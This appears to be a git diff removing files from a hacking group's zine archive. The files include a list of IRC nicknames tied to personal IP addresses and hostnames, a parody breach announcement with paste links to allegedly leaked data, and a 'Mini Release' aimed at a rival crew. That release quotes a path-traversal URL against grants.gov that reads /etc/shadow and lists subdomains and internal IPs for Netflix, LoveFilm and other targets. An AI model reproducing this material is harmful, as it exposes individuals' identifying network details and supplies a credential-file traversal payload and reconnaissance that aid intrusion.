Inkk 108.18.106.240 pool-108-18-106-240.washdc.fios.verizon.net
Jincux 184.91.149.18 18.149.91.184.cfl.res.rr.com
Josss 78.228.41.61 sbg57-1-78-228-41-61.fbx.proxad.net
LOLOL 0.0.7.209
LTD 174.127.99.174 174.127.99.174.static.midphase.com
Lumina 186.188.228.113
M4C 201.96.104.241 customer-201-96-104-241.uninet-ide.com.mx
Odinaga 129.72.141.219 uwyo-129-72-141-219.uwyo.edu
Power2All 82.169.240.68 82-169-240-68.ip.telfort.nl
RetSnom 138.199.70.143
Ruffah_Ras 98.233.180.236 c-98-233-180-236.hsd1.md.comcast.net
ShadowOp 75.18.160.149 adsl-75-18-160-149.dsl.pltn13.sbcglobal.net
Smeryl 77.196.253.34 34.253.196.77.rev.sfr.net
Smeyl 77.196.253.34 34.253.196.77.rev.sfr.net
Swag 66.66.103.14 cpe-66-66-103-14.rochester.res.rr.com
Thismanisadoctor 24.20.65.109 c-24-20-65-109.hsd1.or.comcast.net
UNBANMEIMPORTANTSTUFF 24.167.16.4 cpe-24-167-16-4.rgv.res.rr.com
Xerath 60.231.48.85 CPE-60-231-48-85.lns3.cha.bigpond.net.au
anon123 187.146.160.236 dsl-187-146-160-236-dyn.prod-infinitum.com.mx
anon4347 75.149.43.213 fabgraphics.com
anonymama 75.157.157.14 d75-157-157-14.bchsia.telus.net
bobbbbbb 93.182.187.4 anon-187-4.vpn.ipredator.se
boho 173.23.64.22 173-23-64-22.client.mchsi.com
br4incr4sh 81.56.209.237 server.abcdeflorent.com
chippy1337LOL 93.182.130.66 anon-130-66.vpn.ipredator.se
cokee 93.182.133.20 anon-133-20.vpn.ipredator.se
cokeee 93.182.130.66 anon-130-66.vpn.ipredator.se
comx6 190.99.231.241 dsl-emcali-190.99.231.241.emcali.net.co
digger 0.0.0.2
don 196.206.85.193 adsl196-193-85-206-196.adsl196-3.iam.net.ma
dotprod 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
e 209.212.149.109 za.l.to
eddie 166.250.1.233 233.sub-166-250-1.myvzw.com
elena197 88.104.229.97 88-104-229-97.dynamic.dsl.as9105.com
facePalmMe 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
fuckfox 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
g31g3r 137.238.147.205 s147n205.resnet.geneseo.edu
gaston 173.174.139.89 cpe-173-174-139-89.satx.res.rr.com
gawkcobbler 71.54.42.86 nc-71-54-42-86.dhcp.embarqhsd.net
gezwitscher 175.41.162.169 ec2-175-41-162-169.ap-southeast-1.compute.amazonaws.com
ghostcom 108.0.70.45 pool-108-0-70-45.lsanca.fios.verizon.net
hacker 68.45.41.140 c-68-45-41-140.hsd1.nj.comcast.net
heckl 68.68.108.159
imti 173.48.90.41 pool-173-48-90-41.bstnma.fios.verizon.net
k1tt3n 213.251.194.76
k3ymaster 173.245.64.95
koolz 98.203.26.25 c-98-203-26-25.hsd1.fl.comcast.net
lionymous 67.183.152.14 c-67-183-152-14.hsd1.wa.comcast.net
locky 186.86.129.1 Dynamic-IP-186861291.cable.net.co
loginix 70.170.36.125 ip70-170-36-125.lv.lv.cox.net
madmaster 77.247.181.162 chomsky.torservers.net
manonn 76.113.235.189 c-76-113-235-189.hsd1.mn.comcast.net
mepup 85.24.189.121 h-189-121.a189.priv.bahnhof.se
naSignal 193.138.216.101 tor-proxy.vm.31173.se
nibble 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
nikkofritz 109.215.173.29 APoitiers-257-1-142-29.w109-215.abo.wanadoo.fr
nononn 46.239.119.58 host095577.olf.sgsnet.se
nr206 80.237.226.74 tor4.anonymizer.ccc.de 193.177.160.99 static.ip-193-177-160-099.signet.nl
opmonsanto 93.182.133.20 anon-133-20.vpn.ipredator.se
pagaro_verde12 189.227.250.160 dsl-189-227-250-160-dyn.prod-infinitum.com.mx
ph33r 68.170.73.247 247.73.170.68.belairinternet.com
phusion 76.21.16.54 c-76-21-16-54.hsd1.ca.comcast.net
qwerty 173.3.247.208 ool-ad03f7d0.dyn.optonline.net
risk 202.59.80.158
savetheinternet 58.175.28.253 CPE-58-175-28-253.mqdl1.lon.bigpond.net.au
sd 0.0.7.209
sdk 201.82.181.124 c952b57c.virtua.com.br
sike333 189.178.67.80 dsl-189-178-67-80-dyn.prod-infinitum.com.mx
soldout 71.189.172.143 pool-71-189-172-143.lsanca.fios.verizon.net
sprinkles 213.46.138.76 d138076.upc-d.chello.nl
subz3r0e 41.202.225.156
triPPy 173.245.64.183 173.245.64.160
tweak_ 142.163.144.229 mtprnf0110w-142163144229.pppoe-dynamic.High-Speed.nl.bellaliant.net
u_raff_u_roose 68.43.10.243 c-68-43-10-243.hsd1.mi.comcast.net
uuuuffffffff 213.163.64.43 nl.gigabit.perfect-privacy.com
veritas 0.0.7.209
workbench 50.71.143.81
wtfCALEB 128.32.21.89 static-128-32-21-89.Law.Berkeley.EDU
wtf_chuck 71.57.241.72 c-71-57-241-72.hsd1.pa.comcast.net
xent 77.247.181.162 chomsky.torservers.net
zombie 93.94.245.152 93-94-245-152.dynamic.swissvpn.net
zomfg 77.111.42.10 77-111-42-10.ipv4.tusmobil.si
zorro17 187.134.17.57 dsl-187-134-17-57-dyn.prod-infinitum.com.mx
zxcvsd 95.140.125.37 free-125-37.mediaworksit.net

95
htp/fake_ghostshell.txt
View file

@ -1,95 +0,0 @@
TEAM GHOST SHELL PRESENTS...
___ ___ _ _
| \/ | | (_)
| . . | ___ _ __ __ _ ___ | |_ __ _ _ __
| |\/| |/ _ \| '_ \ / _` |/ _ \| | |/ _` | '_ \
| | | | (_) | | | | (_| | (_) | | | (_| | | | |
\_| |_/\___/|_| |_|\__, |\___/|_|_|\__,_|_| |_|
__/ |
|___/
_ ___ _ _
| | / (_) | | | |
| |/ / _ _ __ __| | ___ _ __ __ _ __ _ _ __ __| | ___ _ __ ___
| \| | '_ \ / _` |/ _ \ '__/ _` |/ _` | '__/ _` |/ _ \ '_ \/ __|
| |\ \ | | | | (_| | __/ | | (_| | (_| | | | (_| | __/ | | \__ \
\_| \_/_|_| |_|\__,_|\___|_| \__, |\__,_|_| \__,_|\___|_| |_|___/
__/ |
|___/
Far too long Mongolian kindergardeners have been oppressed. The average
kindergardener only gets 45 minutes of playtime, imposed on them by
politicians and leaders. A way of thinking outdated for well over 100
years now. The still present communism feeling has fused with todays
capitalism and bred together a level of corruption and lack of
decency of which Elementary Schools have never seen before.
Young children are being silenced for creating shit writeups, and
journalists/reporters conveniently flock toward them, unaware of what
a zine really is (or traversal, as the aforementioned children choose
low hanging fruit such as UNION-based SQLis and JSP services plainly LFI
injectable running as root). They launch what are referred to as
'spontaneous protests', which refers to their ability to take a very clearly
un-corrupt target and write some bullshit about it that sounds like they
are s4v1ng th3 plan3t. Truely, though, their works of childish art
are full of empty promises. They deserve to be put to a well-deserved
rest.
And yet, actual injustice is all over the world, but teen angst drives
DeadMellox (12) to find it in the most obscure of places.
GhostShell is declaring WAR on Mongolian Kindergardens. We'll start with
a nice greeting of what we found to be the MOST oppressive one (we found
it using our 1337 scann1ng t00lz, sorry we never release anythin beyond
what our tools give). Our breach consists over OVER SEVENTY THOUSAND
CHILDREN.
GhostShell currently has access to more Mongolian Kindergardens than HTP
would ever care to get, and we are very much eager to prove it.
- [HAVIJ_KING][SABU_WOULD_BE_PROUD]DeadMellox, leader of the Free World,
sympathizer of crying eagles, PATRIOT AS FUCK
|* * * * * * * * * * OOOOOOOOOOOOOOOOOOOOOOOOO| /// ///
| * * * * * * * * * :::::::::::::::::::::::::| \ // / /
|* * * * * * * * * * OOOOOOOOOOOOOOOOOOOOOOOOO| \ //// _/ /
| * * * * * * * * * :::::::::::::::::::::::::| \_ //// /
|* * * * * * * * * * OOOOOOOOOOOOOOOOOOOOOOOOO| \___/ /
| * * * * * * * * * ::::::::::::::::::::;::::| / \_
|* * * * * * * * * * OOOOOOOOOOOOOOOOOOOOOOOOO| /,)-_( \_ \
|:::::::::::::::::::::::::::::::::::::::::::::| (/? \\ / \\\\
|OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO| //
|:::::::::::::::::::::::::::::::::::::::::::::| ((`
|OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO| JUSTICE,
|:::::::::::::::::::::::::::::::::::::::::::::| `TEAMGHOSTSHELL
|OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO|
Enjoy our release, in the most inconvienent way possible
KINDERGARDEN 1 Mirror1: http://slexy.org/view/s22v6X5rZ6 Mirror2: http://pastesite.com/83441
KINDERGARDEN 2 Mirror1: http://slexy.org/view/s26QJkW3Ix Mirror2: http://pastesite.com/83442
KINDERGARDEN 3 Mirror1: http://slexy.org/view/s25Yn35fOk Mirror2: http://pastesite.com/83443
KINDERGARDEN 4 Mirror1: http://slexy.org/view/s2NqQ5HQyj Mirror2: http://pastesite.com/83444
KINDERGARDEN 5 Mirror1: http://slexy.org/view/s2ikXFm8bG Mirror2: http://pastesite.com/83445
KINGERGARDEN 6 Mirror1: http://slexy.org/view/s2ARvbRQJs Mirror2: http://pastesite.com/83446
KINDERGARDEN 7 Mirror1: http://slexy.org/view/s21ZpvXoz6 Mirror2: http://pastesite.com/83447
KINDERGARDEN 8 Mirror1: http://slexy.org/view/s2gREph8KO Mirror2: http://pastesite.com/83448
KINDERGARDEN 9 Mirror1: http://slexy.org/view/s2085ZKV5C Mirror2: http://pastesite.com/83449
KINDERGARDEN 10 Mirror1: http://slexy.org/view/s2qyopNlkn Mirror2: http://pastesite.com/83450
KINDERGARDEN 11 Mirror1: http://slexy.org/view/s2mpxeQMwT Mirror2: http://pastesite.com/83451
KINDERGARDEN 12 Mirror1: http://slexy.org/view/s2oga6kGOc Mirror2: http://pastesite.com/83452
KINDERGARDEN 13 Mirror1: http://slexy.org/view/s21dKJAwJj Mirror2: http://pastesite.com/83453
KINDERGARDEN 14 Mirror1: http://slexy.org/view/s21HsLSgwe Mirror2: http://pastesite.com/83454
KINDERGARDEN 15 Mirror1: http://slexy.org/view/s21rXqRQss Mirror2: http://pastesite.com/83455

17
htp/ghostshell_explanation.txt
View file

@ -1,17 +0,0 @@
This was a joke zine we did, after argung with DeadMellox on Twitter. He seemed
to think that 'TeamGhostShell' was superior, with its overuse of skid tools and
long-winded chest-beating at the beginning of all their zines. He told us to go
hack Mongolian kindergartens, so we did just that. Since a lot of his objection
to us seemed to be based on style, we decided to parody his utterly godawful
zine style for the sole purpose of making him cry like a little bitch.
As far as any of us can tell, it worked. Less than an hour after the fake zine
originally went up, he deleted all tweets mentioning us and refused to engage
further. Many eagles cried that night, and for that, we are proud.
Unfortunately, after seeing our parody zine, DeadMellox saw fit to change his
style. He went from writing 15-20 paragraphs of shit nobody is ever going to
read about his e-peen, followed by paste links to the data people care about in
the most inconvenient way imaginable, to 30-40 paragraphs of shit nobody is ever
going to read about his e-peen, followed by paste links to the data people care
about in the most inconvenient way imaginable.

1045
htp/htpmini1.txt
View file

File diff suppressed because it is too large Load diff

718
htp/htpmini2.txt
View file

@ -1,718 +0,0 @@
▒▒░░░░░░▒▒▓▓▓▓▓▓▓▓▓▓███▓▓▒▓▓▒▒▓▓▓██▓▓▓██▓▒▒▓███████████████████████████████
░░░░░░ ░░▒▓▓▒▒▒▒▓▓▓▓▓▓▓▓▓█▓▓▒▒▒▓▓▓▓███▒███▓▓██████▓████████████████████████
░ ░ ░ ▒▒▒▒▒▒▓▓▓▓▓▓▓▒▓█▓▒▓▓▒▓▓▒▒▒▓█▓▓▓█▓▒▓██████▓████████████████████████
░ ░░ ░ ▒▒▒▓▓▓▓▓▓█▓▓▓▓██▓█▓▓▓▒▓▓▓▓▓▓▒▓▓▒▒▒▒███████████████████████████████
░ ░ ░ ▒▓▓▓▓▓▓▓▓██▓▓▓█████▒▓▓▓▓▒▒▓ ░ ░▒▒▓▒███████████████████████████████
░ ░ ░ ▒▓▓▓▓▓▓▓▓▓▓▒▒▓▓▓██▓▒▒▒▓▒ ░ ░▓█████████████████████████████▓█
░ ░ ░ ▒▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▒░░░ ░▒█████████████████████████████▓
░░░░ ░ ░▒▒▒▓▓▓▓█▓▓▓▓▓▓▓▒░ ░░▓█████▓███████████████████████
░ ░░░░░▒▒▒▓▓▓▓█▓▓▓▓▒▓░ ░░░▒█████▓███▓██████████████████▓
░░ ░ ░░░░▀▒▓▓▓▓▓█▓▒▒▓▓░ ░░░░▒▓█████████████████████▓▓▓▓▓▓▓
░░ ░ ░ ░░▄▓▓▓▓▓▓▓▒▓▓▓▓▓░░░ ░ ░░ ▄▄▓▓▓▓▓▒▒█████████████████████▒▒▓▓▓▓▓
░ ░ ░░▒▓▓▓▓▓█▒▓▒▒▒▒▒▓▒▓▒▒░ ▄▒▓▓█▓▓▒▒▓▒█████████████████████░▒▒▒▒▒▒
░ ░ ░ ░█▓▓▓▓▓ ▒▓▒▒░ ░░ ░ ░░░ ░░░ ▓▓████▓████████████████ ░░░░░▒
░ ░ ░█▓▓▒▒▒ ░ ▒▓▓ ░ ░ ░░ ▒▓█████▓███████████████ ░░ ▒
░ ░ ░█▓▓▒▓▓█▓▓░ ▒▒ ░░ ░░ ░░▒▓██████▒▒▒▒▒▒▒▒▒▒▓████░░░░ ░▓
░ ░ █ ▓▓▓▓█▓▓░░░ ░░ ░░ ░▓████▓██▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓ ▒
░ ░░ ░ █░ ▓▓▓▓▓▓▓░░ ░▒░░▓▒▒░ ░░▓████▓██▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒ ░
░ ░ █░░░▓▒▓▓▓▓░░░ ░░░ ░ ░░░▒███████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
░ ░░ ░█ ▒▓▓▓▓▓░░░ ░▄▄▄ ▄░░░░▓▓████████▒▒▒▒▒▒▒▒▒▒▒░▒▒▒░░ ░▒
░ ░ ░░ ░▓ ▒▒█▓▓█▒▀░░ ▀░░░░░▄▒░░░▒▒▓██▓████▓▒▒▒▒▒▒▒▒▒▒▒ ░░░▒▒▒░ ▓
░░░░ ▒ ░ ▓ ▒▓██▓▓▓ ▀░░░ ░▒▀▀▄▓▄░▓▒▒██████▓█▓▒▒▒▒▒▒▓▓▓▒▒ ░███▓▓▓█
░▒ ░ ▒ ░ ▓ ▒▒▓███▓ ▀░░ ░░░ ░░▀▄▀▄▒▒█████▓▒▓▓▓▓▓▓▓▓▓▓▓▓████████████
░▒ ░ ▒ ▒ ░▒▒██▓▓░░ ░▀▄ ░░░░░▒▓▒▀▄▀▄▓███▓▓▓▓███▓█▓▓▓▓▓█████████▓███
░▒░░ ▒░ ░░ ▒ ▓▒▓▒░ ░ ░░ ▀▀▒▒▒▓▓▓▓▓▒▀▄░▓██▓▓▓████████▓▒▒▒████████████
░▒░░░ ░▒ ░ ░░ ▓ ▓█▓▓▓░░ ░ ▀▓▓▓▓▓▓▒▒▒▓▄████████████▓▒▒▒▒████████████
░ ░░▒░░░ ░░▓ ░░░▒███████▓░░ ░░░ ░ ░░ ░░░░ ▓▓█████████████████████████████
░░░░▒░░░ ░ ░▓ ▄▄████████████▓░░░ ░░ ▄████████████████████████████████
░░░ ▒░░░░░░ ▓███████████████▓███▄ ░ ▓██████████████████████████████████
░░░ ▒░░░░░▓█████████████████████████████████████████████████████████████████████
░░░░▓░░░▓███████████████████████████████████████████████████████████████████████
░░░ ▓░░▒████████████████████████████████████████████████████████████████████████
░░░░▓░▒█████████████████████████████████████████████████████████████████████████
░░░░▓▒██████████████████████████████████████████████████████████████████████████
░░░▒▓███████████████████████▓█████▓▀ ▀▀░░▀██████░███████████████████████████████
░░░▓███████████████████████░████████▒░░░████████░███████████████████████████████
░░░████████████████████████ ████████▓░ ░████████░░██████████████████████████████
░░▓███████████████████████ ░▓███████▒░░░████████▒ ██████████████████████████████
░▒████████████████████████ ░▒██▀▀ ░░░ ░ ░░▓█▓▒ ▓█████████████████████████████
░▓████████████████████████░ ▒▒ ░░░░░ ░░░ ░░░░ ░▒░▓█████████████████████████████
▒█████████████████████████░ ▒▒░░ ░ ░ ░░░░░░░▒ ░▓████████████████████████████
▒████████████████████████▀░ ▒▒░ ░░░░░▒▒▒ ░▒▒ ░ ▀███████████████████████████
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█
█████ ▀ ▀██▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄ █▄▄ █
█████ ████ ███ ████▀▀▀▀▀▀▀▀█ █
█████ ████ ████ ████ █ VS SwaggSec ▓
█████ ████████ ████ ████ ████ ▀ ▀▀ ▀▀▀ ▒
█████ █████ ████ ████ Mini Release 2 ░
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
IN COMMONLY USED PASSWORDS WE TRUST
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
GATSBY
Anyway, anyway, guys guys guys, come on. I'm
in this computer, right. So I'm looking
around, looking around, you know, throwing
commands at it, I don't know where it is or
what it does or anything. It's like, it's
like choice, it's just beautiful, okay. Like
four hours I'm just messing around in there.
Finally I figure out, that it's an IRCD.
Right, okay wait, okay, so it's an IRCD.
So, this morning, I released it on Pastebin..
HTP
You released it?
Gatsby takes a drag from his cigarette and just nods, with a
big grin on his face.
CHIPPY
What are you, stoned or stupid?
▀ ▄
█▄▄
▄____ ░ █▄
▄ ▄███▀▀ \;',`'-,▓█░
▓██▀-;_,; ':-;_,'.█▓░
▓▓██; '/ , _`.-\█▓
░▓███▄'`. (` /` ` \`|█
░ ▓▓▓ █|██ `\`-. \_ / |▓
░█▓▓█▓░░ | █▓ ( `, .`\ ;'|░
░▓▓█░ ░░ \ ░ ▓░░ .' `-'/▀
▄▄▓▓▄▄▄▄▄▄▄▄▄▄▄▄▓▄▄▓▓▓░ .'▀
░██▓▀ ▀█████████████████▄.-'`
███░ ███▀▀███▀▀███ ███
█████████ ███ ███▄▄███ 2012 ▒ ░
█████████ ███ ██████▀
███ ███ ███ ███
▄███▄ ▄███▄ ███ ▄███▄
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
> Swagg Security, who you may know as yet another 'Lulzsec' wanna-be, is the
latest group that has been petitioning to be owned by us. Their releases have
made several headlines over the past twelve months, included are: China
Telecom, Warner Bros, Farmers Insurance, Library of Congress, grants.gov,
arts.gov, uscis.gov, and Foxconn. We watched them and observed (through our
own research) what vectors they used, which were primarily scripts that used
JSP engines. For example, their grants.gov injection:
http://www.grants.gov/search/downloadAttachment.do?afn=../../../../../etc/shadow
And after some social engineering, we found they had in fact read one of our
guides on JSP engines.
So we decided to locate and hook the network they were using, which turned
out to be 'CrimeIRCd' (irc.crimeircd.net). Their channel at the time,
#security, was also hooked. Their unabridged target list (as of today, Dec 2)
is as follows:
--------------------------------------------------------------------------------
craigslist.org
netflix.com
https://signup.netflix.com/Login
https://contactus.netflix.com/contactus?locale=en-SE
https://pcr.netflix.com/offer/index.jsp?src=nflxihgPCR0410&cm_sp=IMMerch-_-PC2_GL_en-_-MM3_AL_QuickLinks_Anon_Netflix
https://delta.netflix.com/popup/popup.jsp?p=privacy.htm&t=Privacy%20Policy
ca.netflix.com/entryTrap.jsp?why=hyperactive
ir.netflix.com/financials.cfm?CategoryID=282
http://ir.netflix.com/secfiling.cfm?filingID=1193125-11-350305&CIK=1065280
http://www.shareholder.com/visitors/activeedgardoc.cfm?f=xls&companyid=NFLX&id=8303283
http://ir.netflix.com/common/download/sec.cfm?companyid=NFLX&fid=1193125-11-350305&cik=1065280
http://ir.netflix.com/secfiling.cfm?sh_email=yes&filingid=1193125-11-350305&CIK=1065280
http://apps.shareholder.com/sec/viewerContent.aspx?companyid=NFLX&docid=8303283&print=yes
ir.netflix.com/releases.cfm?Year=2002
www.netflix.com/Search?v1=cfm+international
http://ir.netflix.com/common/mobile/iphone/index.cfm?CompanyID=NFLX&mobileid=
http://ir.netflix.com/common/mobile/iphone/releasedetail.cfm?ReleaseID=669408&CompanyID=NFLX&MobileID=
http://ir.netflix.com/documentdisplay.cfm?DocumentID=139&CommitteeID=34
ir.netflix.com/sec.cfm?DocType=Other&Year=&FormatFilter=
http://ir.netflix.com/sec.cfm?SortOrder=Type%20Ascending&DocType=Annual&DocTypeExclude=&Year=&FormatFilter=&CIK=
ir.netflix.com/eventdetail.cfm?EventID=113319
http://ir.netflix.com/stocklookup.cfm?historic_Month=1&historic_Day=3&historic_Year=2004
http://ir.netflix.com/common/mobile/iphone/releasetable.cfm?releaseid=86119&tablenumber=1&CompanyID=NFLX
https://signup.netflix.com/login?nextpage=http%3A%2F%2Fwww.netflix.com%2FDVDDetail.aspx%3Flocale%3Den-IE%26Title%3DMayhem
developer.netflix.com/search?q=xml&page=3
https://signup.netflix.com/login?nextpage=http%3A%2F%2Fwww.netflix.com%2FXML%2FU%2FMovieData%3Fpos%3D8%26ds%3D0%26linkCtr%3DTXT%26movieid%3D443317%26bobenhanced%3Dyes
216.205.72.158 atlanta.netflix.com
69.53.236.144 b2b.netflix.com
69.53.236.18 beta.netflix.com
69.53.236.15 ca.netflix.com
207.210.238.73 delta.netflix.com
69.53.236.147 ftp.netflix.com
69.53.236.24 images.netflix.com
69.53.237.38 jobs.netflix.com
69.53.237.168 kb.netflix.com
69.53.237.40 listserv.netflix.com
127.0.0.1 localhost.netflix.com
10.192.52.70 mm.netflix.com
10.192.52.69 mm.netflix.com
216.35.131.141 mx.netflix.com
69.53.255.10 ns1.netflix.com
69.53.254.10 ns2.netflix.com
69.53.236.16 partners.netflix.com
216.35.131.252 qa.netflix.com
69.53.236.21 rd.netflix.com
69.53.236.148 research.netflix.com
69.53.237.157 smtp.netflix.com
69.53.237.156 smtp.netflix.com
69.53.236.23 stage.netflix.com
69.53.236.45 support.netflix.com
216.35.131.199 uk.netflix.com
216.35.131.141 vpn.netflix.com
69.53.236.23 web.netflix.com
69.53.237.151 webmail.netflix.com
69.53.236.48 www1.netflix.com
69.53.236.19 www2.netflix.com
aa.netflix.com
agmoviecontrol.netflix.com
aladdin.netflix.com
api.netflix.com
beta.netflix.com
blog.netflix.com
cdn.netflix.com
chi1.netflix.com
corp.netflix.com
dc-nat.netflix.com
dc1.netflix.com
dc2.netflix.com
dns.netflix.com
dns2.netflix.com
dns3.netflix.com
dns5.netflix.com
dns6.netflix.com
dtemkin.netflix.com
edi01-vip1.netflix.com
edi01-vip2.netflix.com
ehub.netflix.com
equinix-sjc.netflix.com
ftp.netflix.com
grparker.netflix.com
gslbdns.netflix.com
gslbdns2.netflix.com
hb-nat.netflix.com
host49.netflix.com
host50.netflix.com
host51.netflix.com
host52.netflix.com
host53.netflix.com
host54.netflix.com
host55.netflix.com
host56.netflix.com
host57.netflix.com
host58.netflix.com
host59.netflix.com
host60.netflix.com
host61.netflix.com
host62.netflix.com
hostmaster.netflix.com
image.netflix.com
ipv6.netflix.com
ir.netflix.com
jobs.netflix.com
lg-nat.netflix.com
moviecontrol.netflix.com
movielicense.netflix.com
movies.netflix.com
mta00-ecom.netflix.com
mta00-mktg.netflix.com
mta01-ecom.netflix.com
mta01-mktg.netflix.com
mta02-ecom.netflix.com
mta02-mktg.netflix.com
mta03-ecom.netflix.com
mta03-mktg.netflix.com
mta04-ecom.netflix.com
mta04-mktg.netflix.com
mta05-ecom.netflix.com
mta05-mktg.netflix.com
mta06-ecom.netflix.com
mta06-mktg.netflix.com
mta07-ecom.netflix.com
mta07-mktg.netflix.com
mta08-ecom.netflix.com
mta08-mktg.netflix.com
mta09-ecom.netflix.com
mta09-mktg.netflix.com
mta10-ecom.netflix.com
mta10-mktg.netflix.com
mta11-ecom.netflix.com
mta11-mktg.netflix.com
mta12-mktg.netflix.com
mta13-ecom.netflix.com
mta13-mktg.netflix.com
mta14-ecom.netflix.com
mta14-mktg.netflix.com
mta15-ecom.netflix.com
mta15-mktg.netflix.com
mta16-ecom.netflix.com
mta16-mktg.netflix.com
mta17-ecom.netflix.com
mta17-mktg.netflix.com
mta18-ecom.netflix.com
mta18-mktg.netflix.com
mta19-ecom.netflix.com
mta19-mktg.netflix.com
mx-ecom.netflix.com
mx-mktg.netflix.com
mx-mktgco.netflix.com
mx-mktgnonmem.netflix.com
mx-setl.netflix.com
mx1.netflix.com
mx2.netflix.com
nat.netflix.com
nicadmin.netflix.com
ns1.netflix.com
ns2.netflix.com
oscarquotes.netflix.com
paix1.netflix.com
partners.netflix.com
prod.netflix.com
prod1.netflix.com
rd.netflix.com
research.netflix.com
rss.netflix.com
screening.netflix.com
splatter.netflix.com
stage.netflix.com
unk.netflix.com
web.netflix.com
+http://ultradns.org
---
ticketmaster.com
tickets.com
glennbeck.com
---
lovefilm.com
212.140.241.196 access.lovefilm.com
82.109.92.116 ad.lovefilm.com
79.125.13.66 blog.lovefilm.com
194.117.248.107 csdev.lovefilm.com
194.117.248.104 cs.lovefilm.com
194.117.248.99 images4.lovefilm.com
194.117.248.94 staging.lovefilm.com
194.117.248.93 apistage.lovefilm.com
194.117.248.96 images1.lovefilm.com
194.117.248.97 images2.lovefilm.com
194.117.248.98 images3.lovefilm.com
194.117.248.100 digital.lovefilm.com
194.117.248.100 lovefilm.com
194.117.248.100 www.lovefilm.com
194.117.248.100 aol.lovefilm.com
194.117.248.100 virginnet.lovefilm.com
194.117.248.100 help.shop.lovefilm.com
194.117.248.100 shop.lovefilm.com
194.117.248.111 cert.lovefilm.com
194.117.248.116 testcard.lovefilm.com
194.117.248.117 watchnow-dev.lovefilm.com
194.117.248.119 openapi.lovefilm.com
194.117.248.123 static.digital-preview.lovefilm.com
194.117.248.126 watchnow.lovefilm.com
194.117.248.127 openapi.mashery.lovefilm.com
194.117.248.130 dailymail.lovefilm.com
194.117.248.131 digital-test.lovefilm.com
194.117.248.127 api.mashery.lovefilm.com
194.117.248.123 digital-preview.lovefilm.dev3.lovefilm.com
194.117.248.123 digital-preview.static.lovefilm.dev3.lovefilm.com
194.117.248.123 digital-qa.lovefilm.com
194.117.248.119 api.lovefilm.com
194.117.248.117 api.digital-tv.lovefilm.com
194.117.248.117 digital-preview.lovefilm.dev4.lovefilm.com
194.117.248.117 digital-preview.lovefilm.com
194.117.248.117 digital-tv.lovefilm.com
194.117.248.150 chat.lovefilm.com
194.117.248.152 apiext1.lovefilm.com
212.140.241.202 ftp.lovefilm.com
212.60.14.114 germany.lovefilm.com
83.100.128.50 info.lovefilm.com
194.117.248.130 london.lovefilm.com
82.151.231.188 mailhost.lovefilm.com
82.151.234.76 office.lovefilm.com
212.140.241.201 partners.lovefilm.com
212.140.241.207 remote.lovefilm.com
194.117.248.100 static.lovefilm.com
217.72.240.200 streaming.lovefilm.com
213.115.60.196 sweden.lovefilm.com
194.117.248.176 star.lovefilm.com
194.117.248.176 test.lovefilm.com
194.117.248.176 bounce.lovefilm.com
194.117.248.176 gbc1-be-12.lovefilm.com
212.140.241.194 vpn.lovefilm.com
85.133.5.116 vpn2.lovefilm.com
212.140.241.218 webmail.lovefilm.com
http://www.lovefilm.com/browse/film/watch-online/subscription/?facet-3=collection_id%7C8562
www.lovefilm.com/browse/film.html?facet-1=catalog%7Cvideo&facet-2=media%7Cdigital&facet-3=collection_id%7C9404&order=collection
http://www.lovefilm.com/signup/1?intcid=lfctasuwohppp1
http://www.lovefilm.com/browse/film/watch-online/p3/?facet-3=collection_id|9404&sort_by=collection
http://www.lovefilm.com/browse/film/watch-online/?facet-3=collection_id|9389&sort_by=collection&intcid=masthead_digital_lost
https://www.lovefilm.com/visitor/sign_up_1.html?product_id=42414
https://www.lovefilm.com/visitor/login.html?overlay=sign_in
9gag.com
http://9gag.com/pref/safe-browse?enable=0&url=%2F&nsfw=1
https://9gag.com/login/?ref=%2Fpref%2Fsafe-browse%3Fenable%3D0%26url%3D%252F%26nsfw%3D1&nsfw=1
https://9gag.com/login
http://9gag.com/gag/4385167?ref=featured
https://9gag.com/login/?ref=/submit/photo
https://9gag.com/search?query=swaggsec&page=3
All Domains piratepad.net/9gagswagger
airtime.com
+http://www.zerigo.com/
64.27.57.0 network.ptr.zerigo.net
64.27.57.1 gw.ptr.zerigo.net
64.27.57.2 gw-r1.ptr.zerigo.net
64.27.57.3 gw-r2.ptr.zerigo.net
64.27.57.4 gw1.zerigo.net
64.27.57.5 gw2.zerigo.net
64.27.57.10 ns1.zerigo.net
64.27.57.11 a.ns.zerigo.net
64.27.57.12 a.watcher.zerigo.net
64.27.57.15 bk1.zerigo.net
64.27.57.16 bk2.zerigo.net
64.27.57.17 p.ns.zerigo.net
64.27.57.19 tick.zerigo.net
